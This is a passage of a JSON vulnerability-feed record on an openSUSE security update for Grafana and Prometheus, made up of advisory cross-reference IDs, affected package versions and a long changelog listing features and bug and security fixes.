["CVE-2020-12245", "CVE-2020-13379", "CVE-2019-15043"]}, {"type": "f5", "idList": ["F5:K00843201"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2020-5599.NASL", "REDHAT-RHSA-2020-2861.NASL", "FEDORA_2019-0BB6B876DA.NASL", "REDHAT-RHSA-2020-2796.NASL", "REDHAT-RHSA-2020-2641.NASL", "ORACLELINUX_ELSA-2020-2641.NASL", "OPENSUSE-2020-1105.NASL", "FEDORA_2020-A09E5BE0BE.NASL", "CENTOS8_RHSA-2020-4682.NASL", "REDHAT-RHSA-2020-4682.NASL", "SUSE_SU-2020-1970-1.NASL", "REDHAT-RHSA-2020-1659.NASL", "CENTOS8_RHSA-2020-2641.NASL", "OPENSUSE-2020-892.NASL", "FEDORA_2019-77D612EAB4.NASL", "REDHAT-RHSA-2020-2676.NASL", "NEWSTART_CGSL_NS-SA-2021-0066_GRAFANA.NASL", "CENTOS8_RHSA-2020-1659.NASL", "ORACLELINUX_ELSA-2020-4682.NASL", "REDHAT-RHSA-2021-1518.NASL", "FEDORA_2020-E6E81A03D6.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876775", "OPENVAS:1361412562310142855", "OPENVAS:1361412562310144077", "OPENVAS:1361412562310877981", "OPENVAS:1361412562310143778", "OPENVAS:1361412562310876781", "OPENVAS:1361412562310853237", "OPENVAS:1361412562310877964"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/SUSE-CVE-2020-12245/", "MSF:ILITIES/ORACLE_LINUX-CVE-2020-13379/", "MSF:ILITIES/ORACLE_LINUX-CVE-2020-12245/", "MSF:ILITIES/REDHAT_LINUX-CVE-2020-12245/"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1105-1", "OPENSUSE-SU-2020:1646-1", "OPENSUSE-SU-2020:1611-1"]}, {"type": "fedora", "idList": ["FEDORA:B5BAF6085907", "FEDORA:77DCE3126D28", "FEDORA:6B2F331352FF", "FEDORA:E84B06062C8C"]}, {"type": "archlinux", "idList": ["ASA-201908-21"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5726", "ELSA-2020-4682", "ELSA-2020-1659", "ELSA-2020-2641"]}, {"type": "redhat", "idList": ["RHSA-2020:2676", "RHSA-2020:2792", "RHSA-2020:1659", "RHSA-2020:2861", "RHSA-2020:2641", "RHSA-2020:4298", "RHSA-2020:5599", "RHSA-2021:0083", "RHSA-2021:1518", "RHSA-2020:4682", "RHSA-2020:2796"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158320"]}, {"type": "avleonov", "idList": ["AVLEONOV:8D88294824DE33106DA78BF53C68AEB6"]}, {"type": "exploitdb", "idList": ["EDB-ID:48638"]}, {"type": "zdt", "idList": ["1337DAY-ID-34640"]}, {"type": "almalinux", "idList": ["ALSA-2020:4682"]}], "modified": "2021-10-24T12:28:07", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-10-24T12:28:07", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "7.0.3-lp152.2.3.1", "packageFilename": "grafana-7.0.3-lp152.2.3.1.x86_64.rpm", "packageName": "grafana"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "x86_64", "operator": "lt", "packageVersion": "7.0.3-lp152.2.3.1", "packageFilename": "grafana-debuginfo-7.0.3-lp152.2.3.1.x86_64.rpm", "packageName": "grafana-debuginfo"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "noarch", "operator": "lt", "packageVersion": "1.4.0-lp152.2.3.1", "packageFilename": "grafana-piechart-panel-1.4.0-lp152.2.3.1.noarch.rpm", "packageName": "grafana-piechart-panel"}, {"OS": "openSUSE Leap", "OSVersion": "15.2", "arch": "noarch", "operator": "lt", "packageVersion": "1.0.9-lp152.2.3.1", "packageFilename": "grafana-status-panel-1.0.9-lp152.2.3.1.noarch.rpm", "packageName": "grafana-status-panel"}], "_object_type": "robots.models.suse.SuseBulletin", "_object_types": ["robots.models.suse.SuseBulletin", "robots.models.base.Bulletin"]}], "nessus": [{"id": "OPENSUSE-2020-1105.NASL", "hash": "249b290bede6301eb2c095891de113e2", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)", "description": "This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore remote read). #7096\n\n - Rules: `rule_evaluations_total` and `rule_evaluation_failures_total` have a `rule_group` label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries and recording rules are guaranteed to only see full scrapes and full recording rules. This comes with a certain overhead in resource usage. Depending on the situation, there might be some increase in memory usage, CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload #6745\n\n - Scrape: Log scrape append failures as debug rather than warn #6852\n\n - TSDB: Improve query performance for queries that partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834 #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call' errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago' duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the metadata cache #6675\n\n - promtool: Add support for line-column numbers for invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers #6553\n\n - React UI: adopt grafana flot fix for stacked graphs #6603\n\n - React UI: broken graph page browser history so that back button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered, and log proper error if one is returned from head.Init #6616\n\n - TSDB: return an error on ingesting series with duplicate labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach query.max-concurrency #6712\n\n - PromQL: Fix string and parentheses handling in engine, which affected React UI #6612\n\n - PromQL: Remove output labels returned by absent() if they are produced by multiple identical label matchers #6493\n\n - Scrape: Validate that OpenMetrics input ends with `# EOF` #6505\n\n - Remote read: return the correct error if configs can't be marshal'd to JSON #6622\n\n - Remote write: Make remote client `Store` use passed context, which can affect shutdown timing #6673\n\n - Remote write: Improve sharding calculation in cases where we would always be consistently behind by tracking pendingSamples #6511\n\n - Ensure prometheus_rule_group metrics are deleted when a rule group is removed #6693\n\n - Changes from 2.15.2\n\n + Bug fixes\n\n - TSDB: Fixed support for TSDB blocks built with Prometheus before 2.1.0. #6564\n\n - TSDB: Fixed block compaction issues on Windows. #6547\n\n - Changes from 2.15.1\n\n + Bug fixes\n\n - TSDB: Fixed race on concurrent queries against same data. #6512\n\n - Changes from 2.15.0\n\n + Features \n\n - API: Added new endpoint for exposing per metric metadata `/metadata`. #6420 #6442\n\n + Changes\n\n - Discovery: Removed `prometheus_sd_kubernetes_cache_*` metrics. Additionally `prometheus_sd_kubernetes_workqueue_latency_seconds` and `prometheus_sd_kubernetes_workqueue_work_duration_second s` metrics now show correct values in seconds. #6393\n\n - Remote write: Changed `query` label on `prometheus_remote_storage_*` metrics to `remote_name` and `url`. #6043\n\n + Enhancements\n\n - TSDB: Significantly reduced memory footprint of loaded TSDB blocks. #6418 #6461\n\n - TSDB: Significantly optimized what we buffer during compaction which should result in lower memory footprint during compaction. #6422 #6452 #6468 #6475\n\n - TSDB: Improve replay latency. #6230\n\n - TSDB: WAL size is now used for size based retention calculation. #5886\n\n - Remote read: Added query grouping and range hints to the remote read request #6401\n\n - Remote write: Added `prometheus_remote_storage_sent_bytes_total` counter per queue. #6344\n\n - promql: Improved PromQL parser performance. #6356\n\n - React UI: Implemented missing pages like `/targets` #6276, TSDB status page #6281 #6267 and many other fixes and performance improvements.\n\n - promql: Prometheus now accepts spaces between time range and square bracket. e.g `[ 5m]` #6065 \n\n + Bug fixes\n\n - Config: Fixed alertmanager configuration to not miss targets when configurations are similar. #6455\n\n - Remote write: Value of `prometheus_remote_storage_shards_desired` gauge shows raw value of desired shards and it's updated correctly.\n #6378\n\n - Rules: Prometheus now fails the evaluation of rules and alerts where metric results collide with labels specified in `labels` field. #6469\n\n - API: Targets Metadata API `/targets/metadata` now accepts empty `match_targets` parameter as in the spec.\n #6303\n\n - Changes from 2.14.0\n\n + Features \n\n - API: `/api/v1/status/runtimeinfo` and `/api/v1/status/buildinfo` endpoints added for use by the React UI. #6243\n\n - React UI: implement the new experimental React based UI.\n #5694 and many more\n\n - Can be found by under `/new`.\n\n - Not all pages are implemented yet.\n\n - Status: Cardinality statistics added to the Runtime & Build Information page. #6125\n\n + Enhancements\n\n - Remote write: fix delays in remote write after a compaction. #6021\n\n - UI: Alerts can be filtered by state. #5758\n\n + Bug fixes\n\n - Ensure warnings from the API are escaped. #6279\n\n - API: lifecycle endpoints return 403 when not enabled.\n #6057\n\n - Build: Fix Solaris build. #6149\n\n - Promtool: Remove false duplicate rule warnings when checking rule files with alerts. #6270\n\n - Remote write: restore use of deduplicating logger in remote write. #6113\n\n - Remote write: do not reshard when unable to send samples. #6111\n\n - Service discovery: errors are no longer logged on context cancellation. #6116, #6133\n\n - UI: handle null response from API properly. #6071\n\n - Changes from 2.13.1\n\n + Bug fixes\n\n - Fix panic in ARM builds of Prometheus. #6110\n\n - promql: fix potential panic in the query logger. #6094\n\n - Multiple errors of http: superfluous response.WriteHeader call in the logs. #6145\n\n - Changes from 2.13.0\n\n + Enhancements\n\n - Metrics: renamed prometheus_sd_configs_failed_total to prometheus_sd_failed_configs and changed to Gauge #5254\n\n - Include the tsdb tool in builds. #6089\n\n - Service discovery: add new node address types for kubernetes. #5902\n\n - UI: show warnings if query have returned some warnings.\n #5964\n\n - Remote write: reduce memory usage of the series cache.\n #5849\n\n - Remote read: use remote read streaming to reduce memory usage. #5703\n\n - Metrics: added metrics for remote write max/min/desired shards to queue manager. #5787\n\n - Promtool: show the warnings during label query. #5924\n\n - Promtool: improve error messages when parsing bad rules.\n #5965\n\n - Promtool: more promlint rules. #5515\n\n + Bug fixes\n\n - UI: Fix a Stored DOM XSS vulnerability with query history [CVE-2019-10215](http://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2019-10215). #6098\n\n - Promtool: fix recording inconsistency due to duplicate labels. #6026\n\n - UI: fixes service-discovery view when accessed from unhealthy targets. #5915\n\n - Metrics format: OpenMetrics parser crashes on short input. #5939\n\n - UI: avoid truncated Y-axis values. #6014\n\n - Changes from 2.12.0\n\n + Features \n\n - Track currently active PromQL queries in a log file.\n #5794\n\n - Enable and provide binaries for `mips64` / `mips64le` architectures. #5792\n\n + Enhancements\n\n - Improve responsiveness of targets web UI and API endpoint. #5740\n\n - Improve remote write desired shards calculation. #5763\n\n - Flush TSDB pages more precisely. tsdb#660\n\n - Add `prometheus_tsdb_retention_limit_bytes` metric.\n tsdb#667\n\n - Add logging during TSDB WAL replay on startup. tsdb#662\n\n - Improve TSDB memory usage. tsdb#653, tsdb#643, tsdb#654, tsdb#642, tsdb#627\n\n + Bug fixes\n\n - Check for duplicate label names in remote read. #5829\n\n - Mark deleted rules' series as stale on next evaluation.\n #5759\n\n - Fix JavaScript error when showing warning about out-of-sync server time. #5833\n\n - Fix `promtool test rules` panic when providing empty `exp_labels`. #5774\n\n - Only check last directory when discovering checkpoint number. #5756\n\n - Fix error propagation in WAL watcher helper functions.\n #5741\n\n - Correctly handle empty labels from alert templates.\n #5845\n\n - Update Uyuni/SUSE Manager service discovery patch\n\n + Adapt service discovery to the new Uyuni API endpoints\n\n + Modified spec file: force golang 1.12 to fix build issues in SLE15SP2\n\n - Update to Prometheus 2.11.2\n\ngrafana :\n\n - Update to version 7.0.3\n\n - Features / Enhancements\n\n - Stats: include all fields. #24829, @ryantxu\n\n - Variables: change VariableEditorList row action Icon to IconButton. #25217, @hshoff\n\n - Bug fixes\n\n - Cloudwatch: Fix dimensions of DDoSProtection. #25317, @papagian\n\n - Configuration: Fix env var override of sections containing hyphen. #25178, @marefr\n\n - Dashboard: Get panels in collapsed rows. #25079, @peterholmberg\n\n - Do not show alerts tab when alerting is disabled.\n #25285, @dprokop\n\n - Jaeger: fixes cascader option label duration value.\n #25129, @Estrax\n\n - Transformations: Fixed Transform tab crash & no update after adding first transform. #25152, @torkelo\n\n - Update to version 7.0.2\n\n - Bug fixes\n\n - Security: Urgent security patch release to fix CVE-2020-13379\n\n - Update to version 7.0.1\n\n - Features / Enhancements\n\n - Datasource/CloudWatch: Makes CloudWatch Logs query history more readable. #24795, @kaydelaney\n\n - Download CSV: Add date and time formatting. #24992, @ryantxu\n\n - Table: Make last cell value visible when right aligned.\n #24921, @peterholmberg\n\n - TablePanel: Adding sort order persistance. #24705, @torkelo\n\n - Transformations: Display correct field name when using reduce transformation. #25068, @peterholmberg\n\n - Transformations: Allow custom number input for binary operations. #24752, @ryantxu\n\n - Bug fixes\n\n - Dashboard/Links: Fixes dashboard links by tags not working. #24773, @KamalGalrani\n\n - Dashboard/Links: Fixes open in new window for dashboard link. #24772, @KamalGalrani\n\n - Dashboard/Links: Variables are resolved and limits to 100. #25076, @hugohaggmark\n\n - DataLinks: Bring back variables interpolation in title.\n #24970, @dprokop\n\n - Datasource/CloudWatch: Field suggestions no longer limited to prefix-only. #24855, @kaydelaney\n\n - Explore/Table: Keep existing field types if possible.\n #24944, @kaydelaney\n\n - Explore: Fix wrap lines toggle for results of queries with filter expression. #24915, @ivanahuckova\n\n - Explore: fix undo in query editor. #24797, @zoltanbedi\n\n - Explore: fix word break in type head info. #25014, @zoltanbedi\n\n - Graph: Legend decimals now work as expected. #24931, @torkelo\n\n - LoginPage: Fix hover color for service buttons. #25009, @tskarhed\n\n - LogsPanel: Fix scrollbar. #24850, @ivanahuckova\n\n - MoveDashboard: Fix for moving dashboard caused all variables to be lost. #25005, @torkelo\n\n - Organize transformer: Use display name in field order comparer. #24984, @dprokop\n\n - Panel: shows correct panel menu items in view mode.\n #24912, @hugohaggmark\n\n - PanelEditor Fix missing labels and description if there is only single option in category. #24905, @dprokop\n\n - PanelEditor: Overrides name matcher still show all original field names even after Field default display name is specified. #24933, @torkelo\n\n - PanelInspector: Makes sure Data display options are visible. #24902, @hugohaggmark\n\n - PanelInspector: Hides unsupported data display options for Panel type. #24918, @hugohaggmark\n\n - PanelMenu: Make menu disappear on button press. #25015, @tskarhed\n\n - Postgres: Fix add button. #25087, @phemmer\n\n - Prometheus: Fix recording rules expansion. #24977, @ivanahuckova\n\n - Stackdriver: Fix creating Service Level Objectives (SLO) datasource query variable. #25023, @papagian\n\n - Update to version 7.0.0 \n\n - Breaking changes\n\n - Removed PhantomJS: PhantomJS was deprecated in Grafana v6.4 and starting from Grafana v7.0.0, all PhantomJS support has been removed. This means that Grafana no longer ships with a built-in image renderer, and we advise you to install the Grafana Image Renderer plugin.\n\n - Dashboard: A global minimum dashboard refresh interval is now enforced and defaults to 5 seconds.\n\n - Interval calculation: There is now a new option Max data points that controls the auto interval $__interval calculation. Interval was previously calculated by dividing the panel width by the time range. With the new max data points option it is now easy to set $__interval to a dynamic value that is time range agnostic. For example if you set Max data points to 10 Grafana will dynamically set $__interval by dividing the current time range by 10.\n\n - Datasource/Loki: Support for deprecated Loki endpoints has been removed.\n\n - Backend plugins: Grafana now requires backend plugins to be signed, otherwise Grafana will not load/start them.\n This is an additional security measure to make sure backend plugin binaries and files haven't been tampered with. Refer to Upgrade Grafana for more information.\n\n - @grafana/ui: Forms migration notice, see @grafana/ui changelog\n\n - @grafana/ui: Select API change for creating custom values, see @grafana/ui changelog\n\n + Deprecation warnings\n\n - Scripted dashboards is now deprecated. The feature is not removed but will be in a future release. We hope to address the underlying requirement of dynamic dashboards in a different way. #24059\n\n - The unofficial first version of backend plugins together with usage of grafana/grafana-plugin-model is now deprecated and support for that will be removed in a future release. Please refer to backend plugins documentation for information about the new officially supported backend plugins.\n\n - Features / Enhancements\n\n - Backend plugins: Log deprecation warning when using the unofficial first version of backend plugins. #24675, @marefr\n\n - Editor: New line on Enter, run query on Shift+Enter.\n #24654, @davkal\n\n - Loki: Allow multiple derived fields with the same name.\n #24437, @aocenas\n\n - Orgs: Add future deprecation notice. #24502, @torkelo\n\n - Bug Fixes\n\n - @grafana/toolkit: Use process.cwd() instead of PWD to get directory. #24677, @zoltanbedi\n\n - Admin: Makes long settings values line break in settings page. #24559, @hugohaggmark\n\n - Dashboard: Allow editing provisioned dashboard JSON and add confirmation when JSON is copied to dashboard.\n #24680, @dprokop\n\n - Dashboard: Fix for strange 'dashboard not found' errors when opening links in dashboard settings. #24416, @torkelo\n\n - Dashboard: Fix so default data source is selected when data source can't be found in panel editor. #24526, @mckn\n\n - Dashboard: Fixed issue changing a panel from transparent back to normal in panel editor. #24483, @torkelo\n\n - Dashboard: Make header names reflect the field name when exporting to CSV file from the the panel inspector.\n #24624, @peterholmberg\n\n - Dashboard: Make sure side pane is displayed with tabs by default in panel editor. #24636, @dprokop\n\n - Data source: Fix query/annotation help content formatting. #24687, @AgnesToulet\n\n - Data source: Fixes async mount errors. #24579, @Estrax\n\n - Data source: Fixes saving a data source without failure when URL doesn't specify a protocol. #24497, @aknuds1\n\n - Explore/Prometheus: Show results of instant queries only in table. #24508, @ivanahuckova\n\n - Explore: Fix rendering of react query editors. #24593, @ivanahuckova\n\n - Explore: Fixes loading more logs in logs context view.\n #24135, @Estrax\n\n - Graphite: Fix schema and dedupe strategy in rollup indicators for Metrictank queries. #24685, @torkelo\n\n - Graphite: Makes query annotations work again. #24556, @hugohaggmark\n\n - Logs: Clicking 'Load more' from context overlay doesn't expand log row. #24299, @kaydelaney\n\n - Logs: Fix total bytes process calculation. #24691, @davkal\n\n - Org/user/team preferences: Fixes so UI Theme can be set back to Default. #24628, @AgnesToulet\n\n - Plugins: Fix manifest validation. #24573, @aknuds1\n\n - Provisioning: Use proxy as default access mode in provisioning. #24669, @bergquist\n\n - Search: Fix select item when pressing enter and Grafana is served using a sub path. #24634, @tskarhed\n\n - Search: Save folder expanded state. #24496, @Clarity-89\n\n - Security: Tag value sanitization fix in OpenTSDB data source. #24539, @rotemreiss\n\n - Table: Do not include angular options in options when switching from angular panel. #24684, @torkelo\n\n - Table: Fixed persisting column resize for time series fields. #24505, @torkelo\n\n - Table: Fixes Cannot read property subRows of null.\n #24578, @hugohaggmark\n\n - Time picker: Fixed so you can enter a relative range in the time picker without being converted to absolute range. #24534, @mckn\n\n - Transformations: Make transform dropdowns not cropped.\n #24615, @dprokop\n\n - Transformations: Sort order should be preserved as entered by user when using the reduce transformation.\n #24494, @hugohaggmark\n\n - Units: Adds scale symbol for currencies with suffixed symbol. #24678, @hugohaggmark\n\n - Variables: Fixes filtering options with more than 1000 entries. #24614, @hugohaggmark\n\n - Variables: Fixes so Textbox variables read value from url. #24623, @hugohaggmark\n\n - Zipkin: Fix error when span contains remoteEndpoint.\n #24524, @aocenas\n\n - SAML: Switch from email to login for user login attribute mapping (Enterprise)\n\n - Update Makefile and spec file\n\n - Remove phantomJS patch from Makefile \n\n - Fix multiline strings in Makefile\n\n - Exclude s390 from SLE12 builds, golang 1.14 is not built for s390\n\n - Add instructions for patching the Grafana JavaScript frontend.\n\n - BuildRequires golang(API) instead of go metapackage version range\n\n - BuildRequires: golang(API) >= 1.14 from BuildRequires: ( go >= 1.14 with go < 1.15 )\n\n - Update to version 6.7.3\n\n - This version fixes bsc#1170557 and its corresponding CVE-2020-12245\n\n - Admin: Fix Synced via LDAP message for non-LDAP external users. #23477, @alexanderzobnin\n\n - Alerting: Fixes notifications for alerts with empty message in Google Hangouts notifier. #23559, @hugohaggmark\n\n - AuthProxy: Fixes bug where long username could not be cached.. #22926, @jcmcken\n\n - Dashboard: Fix saving dashboard when editing raw dashboard JSON model. #23314, @peterholmberg\n\n - Dashboard: Try to parse 8 and 15 digit numbers as timestamps if parsing of time range as date fails.\n #21694, @jessetan\n\n - DashboardListPanel: Fixed problem with empty panel after going into edit mode (General folder filter being automatically added) . #23426, @torkelo\n\n - Data source: Handle datasource withCredentials option properly. #23380, @hvtuananh\n\n - Security: Fix annotation popup XSS vulnerability.\n #23813, @torkelo\n\n - Server: Exit Grafana with status code 0 if no error.\n #23312, @aknuds1\n\n - TablePanel: Fix XSS issue in header column rename (backport). #23814, @torkelo\n\n - Variables: Fixes error when setting adhoc variable values. #23580, @hugohaggmark\n\n - Update to version 6.7.2: (see installed changelog for the full list of changes)\n\n - BackendSrv: Adds config to response to fix issue for external plugins that used this property . #23032, @torkelo\n\n - Dashboard: Fixed issue with saving new dashboard after changing title . #23104, @dprokop\n\n - DataLinks: make sure we use the correct datapoint when dataset contains null value.. #22981, @mckn\n\n - Plugins: Fixed issue for plugins that imported dateMath util . #23069, @mckn\n\n - Security: Fix for dashboard snapshot original dashboard link could contain XSS vulnerability in url. #23254, @torkelo\n\n - Variables: Fixes issue with too many queries being issued for nested template variables after value change.\n #23220, @torkelo\n\n - Plugins: Expose promiseToDigest. #23249, @torkelo\n\n - Reporting (Enterprise): Fixes issue updating a report created by someone else\n\n - Update to 6.7.1: (see installed changelog for the full list of changes) Bug Fixes\n\n - Azure: Fixed dropdowns not showing current value.\n #22914, @torkelo\n\n - BackendSrv: only add content-type on POST, PUT requests.\n #22910, @hugohaggmark\n\n - Panels: Fixed size issue with panel internal size when exiting panel edit mode. #22912, @torkelo\n\n - Reporting: fixes migrations compatibility with mysql (Enterprise)\n\n - Reporting: Reduce default concurrency limit to 4 (Enterprise)\n\n - Update to 6.7.0: (see installed changelog for the full list of changes) Bug Fixes\n\n - AngularPanels: Fixed inner height calculation for angular panels . #22796, @torkelo\n\n - BackendSrv: makes sure provided headers are correctly recognized and set. #22778, @hugohaggmark\n\n - Forms: Fix input suffix position (caret-down in Select) . #22780, @torkelo\n\n - Graphite: Fixed issue with query editor and next select metric now showing after selecting metric node . #22856, @torkelo\n\n - Rich History: UX adjustments and fixes. #22729, @ivanahuckova\n\n - Update to 6.7.0-beta1: Breaking changes\n\n - Slack: Removed Mention setting and instead introduce Mention Users, Mention Groups, and Mention Channel. The first two settings require user and group IDs, respectively. This change was necessary because the way of mentioning via the Slack API changed and mentions in Slack notifications no longer worked.\n\n - Alerting: Reverts the behavior of diff and percent_diff to not always be absolute. Something we introduced by mistake in 6.1.0. Alerting now support diff(), diff_abs(), percent_diff() and percent_diff_abs().\n #21338\n\n - Notice about changes in backendSrv for plugin authors In our mission to migrate away from AngularJS to React we have removed all AngularJS dependencies in the core data retrieval service backendSrv. Removing the AngularJS dependencies in backendSrv has the unfortunate side effect of AngularJS digest no longer being triggered for any request made with backendSrv. Because of this, external plugins using backendSrv directly may suffer from strange behaviour in the UI. To remedy this issue, as a plugin author you need to trigger the digest after a direct call to backendSrv. Bug Fixes API: Fix redirect issues. #22285, @papagian Alerting: Don't include image_url field with Slack message if empty. #22372, @aknuds1 Alerting: Fixed bad background color for default notifications in alert tab . #22660, @krvajal Annotations: In table panel when setting transform to annotation, they will now show up right away without a manual refresh. #22323, @krvajal Azure Monitor: Fix app insights source to allow for new __timeFrom and\n __timeTo. #21879, @ChadNedzlek BackendSrv: Fixes POST body for form data. #21714, @hugohaggmark CloudWatch:\n Credentials cache invalidation fix. #22473, @sunker CloudWatch: Expand alias variables when query yields no result. #22695, @sunker Dashboard: Fix bug with NaN in alerting. #22053, @a-melnyk Explore: Fix display of multiline logs in log panel and explore. #22057, @thomasdraebing Heatmap: Legend color range is incorrect when using custom min/max. #21748, @sv5d Security: Fixed XSS issue in dashboard history diff . #22680, @torkelo StatPanel: Fixes base color is being used for null values . #22646, @torkelo\n\n - Update to version 6.6.2: (see installed changelog for the full list of changes)\n\n - Update to version 6.6.1: (see installed changelog for the full list of changes)\n\n - Update to version 6.6.0: (see installed changelog for the full list of changes)\n\n - Update to version 6.5.3: (see installed changelog for the full list of changes)\n\n - Update to version 6.5.2: (see installed changelog for the full list of changes)\n\n - Update to version 6.5.1: (see installed changelog for the full list of changes)\n\n - Update to version 6.5.0 (see installed changelog for the full list of changes)\n\n - Update to version 6.4.5 :\n\n - Create version 6.4.5\n\n - CloudWatch: Fix high CPU load (#20579)\n\n - Add obs-service-go_modules to download required modules into vendor.tar.gz\n\n - Adjusted spec file to use vendor.tar.gz\n\n - Adjusted Makefile to work with new filenames\n\n - BuildRequire go1.14\n\n - Update to version 6.4.4 :\n\n - DataLinks: Fix blur issues. #19883, @aocenas\n\n - Docker: Makes it possible to parse timezones in the docker image. #20081, @xlson\n\n - LDAP: All LDAP servers should be tried even if one of them returns a connection error. #20077, @jongyllen\n\n - LDAP: No longer shows incorrectly matching groups based on role in debug page. #20018, @xlson\n\n - Singlestat: Fix no data / null value mapping . #19951, @ryantxu\n\n - Revert the spec file and make script\n\n - Remove PhantomJS dependency\n\n - Update to 6.4.3\n\n - Bug Fixes\n\n - Alerting: All notification channels should send even if one fails to send. #19807, @jan25\n\n - AzureMonitor: Fix slate interference with dropdowns.\n #19799, @aocenas\n\n - ContextMenu: make ContextMenu positioning aware of the viewport width. #19699, @krvajal\n\n - DataLinks: Fix context menu not showing in singlestat-ish visualisations. #19809, @dprokop\n\n - DataLinks: Fix url field not releasing focus. #19804, @aocenas\n\n - Datasource: Fixes clicking outside of some query editors required 2 clicks. #19822, @aocenas\n\n - Panels: Fixes default tab for visualizations without Queries Tab. #19803, @hugohaggmark\n\n - Singlestat: Fixed issue with mapping null to text.\n #19689, @torkelo\n\n - @grafana/toolkit: Don't fail plugin creation when git user.name config is not set. #19821, @dprokop\n\n - @grafana/toolkit: TSLint line number off by 1. #19782, @fredwangwang\n\n - Update to 6.4.2\n\n - Bug Fixes\n\n - CloudWatch: Changes incorrect dimension wmlid to wlmid .\n #19679, @ATTron\n\n - Grafana Image Renderer: Fixes plugin page. #19664, @hugohaggmark\n\n - Graph: Fixes auto decimals logic for y axis ticks that results in too many decimals for high values. #19618, @torkelo\n\n - Graph: Switching to series mode should re-render graph.\n #19623, @torkelo\n\n - Loki: Fix autocomplete on label values. #19579, @aocenas\n\n - Loki: Removes live option for logs panel. #19533, @davkal\n\n - Profile: Fix issue with user profile not showing more than sessions sessions in some cases. #19578, @huynhsamha\n\n - Prometheus: Fixes so results in Panel always are sorted by query order. #19597, @hugohaggmark\n\n - ShareQuery: Fixed issue when using -- Dashboard -- datasource (to share query result) when dashboard had rows. #19610, @torkelo\n\n - Show SAML login button if SAML is enabled. #19591, @papagian\n\n - SingleStat: Fixes postfix/prefix usage. #19687, @hugohaggmark\n\n - Table: Proper handling of json data with dataframes.\n #19596, @marefr\n\n - Units: Fixed wrong id for Terabits/sec. #19611, @andreaslangnevyjel\n\n - Changes from 6.4.1\n\n - Bug Fixes\n\n - Provisioning: Fixed issue where empty nested keys in YAML provisioning caused a server crash, #19547\n\n - ImageRendering: Fixed issue with image rendering in enterprise build (Enterprise)\n\n - Reporting: Fixed issue with reporting service when STMP was disabled (Enterprise).\n\n - Changes from 6.4.0\n\n - Features / Enhancements\n\n - Build: Upgrade go to 1.12.10. #19499, @marefr\n\n - DataLinks: Suggestions menu improvements. #19396, @dprokop\n\n - Explore: Take root_url setting into account when redirecting from dashboard 